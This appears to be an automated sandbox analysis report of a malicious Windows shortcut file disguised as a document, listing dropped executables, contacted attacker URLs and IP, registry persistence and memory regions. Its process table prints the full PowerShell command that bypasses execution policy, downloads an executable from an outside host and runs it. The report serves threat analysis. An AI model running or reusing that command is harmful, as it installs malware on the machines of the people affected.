Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Document.doc.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Archive,
ctime=Mon Mar 4 12:38:03 2024, mtime=Thu Mar 28 00:08:10 2024, atime=Mon Mar 4 12:38:03 2024, length=236544, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\user\windrv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\winsvc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31cwohp1.xgz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hos10ij.2v0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqpxgnpy.exl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qaprh5ea.nop.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process
'C:\Users\user\windrv.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process
'C:\Users\user\windrv.exe'
|
||
C:\Users\user\windrv.exe
|
"C:\Users\user\windrv.exe"
|
||
C:\Users\user\winsvc.exe
|
C:\Users\user\winsvc.exe
|
||
C:\Users\user\winsvc.exe
|
"C:\Users\user\winsvc.exe"
|
||
C:\Users\user\winsvc.exe
|
"C:\Users\user\winsvc.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://twizt.net
|
unknown
|
||
http://twizt.net/spl.exe
|
185.215.113.66
|
||
http://twizt.net/Installed
|
185.215.113.66
|
||
http://twizt.net/lslut.exe
|
185.215.113.66
|
||
http://twizt.net/lslut.exewinsvc.exe
|
unknown
|
||
http://twizt.net/InstalledT
|
unknown
|
||
http://twizt.net/lslj
|
unknown
|
||
http://twizt.net/lslut.eH
|
unknown
|
||
http://twizt.net/InstalledopenMozilla/5.0
|
unknown
|
||
http://twizt.net/lslut.exee
|
unknown
|
||
http://twizt.net/lslut.exeb
|
unknown
|
||
http://twizt.net/InstalledL
|
unknown
|
||
http://twizt.net/lslut.e
|
unknown
|
||
http://twizt.net/lslut.e8
|
unknown
|
||
http://twizt.net/lslut.exeu
|
unknown
|
||
http://twizt.net/lslut.exe2
|
unknown
|
||
http://twizt.net/lslut.exer
|
unknown
|
||
http://twizt.net/lslut.exes
|
unknown
|
||
http://fuckput.in/N
|
unknown
|
||
http://twizt.net/lslut.exewinsvc.exeKT
|
unknown
|
||
http://twizt.net/InstalledXZ
|
unknown
|
||
http://twizt.net/lsl
|
unknown
|
||
http://twizt.net/lslut.exe%s:Zone.Identifier%userprofile%%s
|
unknown
|
||
http://twizt.net/?
|
unknown
|
||
http://fuckput.in/
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
twizt.net
|
185.215.113.66
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.215.113.66
|
twizt.net
|
Portugal
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Windows Service
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
9DE000
|
stack
|
page read and write
|
||
286E000
|
stack
|
page read and write
|
||
296F000
|
stack
|
page read and write
|
||
DB5000
|
heap
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
536000
|
stack
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
57E000
|
heap
|
page read and write
|
||
EE5000
|
heap
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
A2E000
|
stack
|
page read and write
|
||
53A000
|
stack
|
page read and write
|
||
71C000
|
stack
|
page read and write
|
||
2EC000
|
stack
|
page read and write
|
||
302D000
|
stack
|
page read and write
|
||
8E3000
|
unkown
|
page readonly
|
||
2BEC000
|
stack
|
page read and write
|
||
AF6000
|
stack
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
8E3000
|
unkown
|
page readonly
|
||
8AE000
|
stack
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
2AAF000
|
stack
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
790000
|
heap
|
page read and write
|
||
C3E000
|
stack
|
page read and write
|
||
326E000
|
stack
|
page read and write
|
||
8E0000
|
unkown
|
page readonly
|
||
5CA000
|
heap
|
page read and write
|
||
C55000
|
unkown
|
page readonly
|
||
900000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
5A9000
|
heap
|
page read and write
|
||
7AE000
|
stack
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
FAE000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
5E6000
|
heap
|
page read and write
|
||
2D2E000
|
stack
|
page read and write
|
||
D9E000
|
stack
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
B1E000
|
stack
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
276F000
|
stack
|
page read and write
|
||
33CE000
|
stack
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
2CEE000
|
stack
|
page read and write
|
||
2AED000
|
stack
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
C51000
|
unkown
|
page execute read
|
||
C51000
|
unkown
|
page execute read
|
||
5D6000
|
heap
|
page read and write
|
||
FAA000
|
heap
|
page read and write
|
||
6EE000
|
stack
|
page read and write
|
||
FF0000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
C2F000
|
stack
|
page read and write
|
||
D56000
|
stack
|
page read and write
|
||
E80000
|
heap
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
C55000
|
unkown
|
page readonly
|
||
3EB000
|
stack
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
710000
|
heap
|
page read and write
|
||
8E0000
|
unkown
|
page readonly
|
||
2EEF000
|
stack
|
page read and write
|
||
5BE000
|
heap
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
C51000
|
unkown
|
page execute read
|
||
908000
|
heap
|
page read and write
|
||
C51000
|
unkown
|
page execute read
|
||
312C000
|
stack
|
page read and write
|
||
2C2D000
|
stack
|
page read and write
|
||
2FEF000
|
stack
|
page read and write
|
||
AFB000
|
stack
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
32CE000
|
stack
|
page read and write
|
||
C55000
|
unkown
|
page readonly
|
||
B60000
|
heap
|
page read and write
|
||
C55000
|
unkown
|
page readonly
|
||
FDB000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
C55000
|
unkown
|
page readonly
|
||
ED8000
|
heap
|
page read and write
|
||
EFE000
|
stack
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
C30000
|
heap
|
page read and write
|
||
C53000
|
unkown
|
page readonly
|
||
8E1000
|
unkown
|
page execute read
|
||
8E1000
|
unkown
|
page execute read
|
||
F3E000
|
stack
|
page read and write
|
||
8EF000
|
stack
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
8E5000
|
unkown
|
page readonly
|
||
1250000
|
heap
|
page read and write
|
||
29AE000
|
stack
|
page read and write
|
||
316E000
|
stack
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
8E5000
|
unkown
|
page readonly
|
||
A9E000
|
stack
|
page read and write
|
||
10CF000
|
stack
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
555000
|
heap
|
page read and write
|
||
F8E000
|
stack
|
page read and write
|
||
3E6000
|
stack
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
550000
|
heap
|
page read and write
|
||
43C000
|
stack
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
C51000
|
unkown
|
page execute read
|
||
C51000
|
unkown
|
page execute read
|
||
D5B000
|
stack
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
100D000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
92C000
|
stack
|
page read and write
|
||
92E000
|
stack
|
page read and write
|
||
C50000
|
unkown
|
page readonly
|
||
C55000
|
unkown
|
page readonly
|
There are 115 hidden memdumps, click here to show them.